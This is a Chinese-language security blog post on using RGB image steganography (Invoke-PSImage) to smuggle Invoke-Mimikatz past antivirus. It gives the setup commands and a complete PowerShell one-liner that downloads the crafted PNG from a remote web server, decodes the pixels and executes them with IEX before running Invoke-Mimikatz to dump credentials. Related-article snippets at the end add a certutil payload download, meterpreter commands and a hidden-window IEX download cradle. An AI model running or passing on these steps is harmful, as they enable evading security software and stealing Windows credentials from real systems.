隐写RGB-mimikatz读取绕过杀软

VSole2023-01-07 11:07:10

利用隐写RGB,进行mimikatz过杀软

准备工作

Invoke-PSImage.ps1Invoke-Mimikatz.ps1demo.jpg(大于100k,不然无法加载mimikatz的像素)

过程

Set-ExecutionPolicy Unrestricted -Scope CurrentUser //设置脚本策略Import-Module .\Invoke-PSimage.ps1 //导入脚本模块Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\mimikatz.png -Image .\demo.jpg -Web
生成一个mimikatz.png

开启一个目标可以访问的web服务,加载生成的mimikatz.png图片。修改 example.com改成自己的web服务地址。然后进行远程加载即可。
利用 python3 -m http.server //开启web服务

生成的远程加载如下

sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://192.168.3.210:8000/mimikatz.png"));$o=a Byte[] 1355520;(0..352)|%{foreach($x in(0..3839)){$p=$g.GetPixel($x,$_);$o[$_*3840+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..1352514]));

想要读取还有在后面加

;Invoke-Mimikatz

完整如下

sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://192.168.3.210:8000/mimikatz.png"));$o=a Byte[] 1355520;(0..352)|%{foreach($x in(0..3839)){$p=$g.GetPixel($x,$_);$o[$_*3840+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..1352514]));Invoke-Mimikatz

systemmimikatz
本作品采用《CC 协议》,转载必须注明作者和本文链接
干货!!!
全在域环境中,用户信息存储在域控的ntds.dit(C:\Windows\NTDS\NTDS.dit)中; 非域环境也就是在工作组环境中,当前主机用户的密码信息存储着在sam文件(C:\Windows\System32\config\SAM)。 Windows操作系统通常使用两种方法(LM和NTLM)对用户的明文密码进行加密处理。 LM只能存储小于等于14个字符的密码hash 如果密码大于
过程Set-ExecutionPolicy Unrestricted -Scope CurrentUser //设置脚本策略Import-Module .\Invoke-PSimage.ps1 //导入脚本模块Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\mimikatz.png -Image .\demo.jpg -Web. 开启一个目标可以访问的web服务,加载生成的mimikatz.png图片。修改 example.com改成自己的web服务地址。然后进行远程加载即可。
mimikatz的这个功能从本质上是解析Windows的数据库文件,从而获取其中存储的用户哈希。
后渗透
2021-10-09 06:35:54
如果是这种情况,您不能只是转储或解析 LSASS,您需要使用类似mimidrv.sys,PPLDump等 使用 Mimikatz 转储操作系统凭据
主要记录拿到Shell后再反弹MSF Shell、Mimikatz抓取密码以及登录域控等内网部分。前面漏洞环境搭建及打点等不作记录,可查看参考文章。攻击机利用Python开启HTTP服务$ python -m SimpleHTTPServer 8080. 靶机CMD下载木马文件$ certutil.exe -urlcache -split -f http://<攻击者IP>:8080/win.exe. [*] Started reverse TCP handler on <攻击者IP>:<攻击机监听端口>. 并且需要迁移到权限为NT AUTHORITY\SYSTEM的进程,因为进程迁移后meterpreter的权限是迁移进程的权限。查看靶机位数&进程meterpreter > sysinfo # 查看位数。配置路由meterpreter > run autoroute -s 192.168.52.0/24. MS17-010扫一下MS17-010meterpreter > background # 后台挂起Session
拿下一台运维机,上了个CS,发现曾经连接过几台服务器并且保存了凭据,网上查了圈发现CS不支持交互式mimikatz,记录下获取远程主机RDP凭据。
前言本篇介绍几款优秀的Windows上的密码抓取工具,每个工具都有自己的特点非常实用,欢迎补充。
powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://xx.xx.xx.xx:8888/logo.gif'))\"" /f
VSole
网络安全专家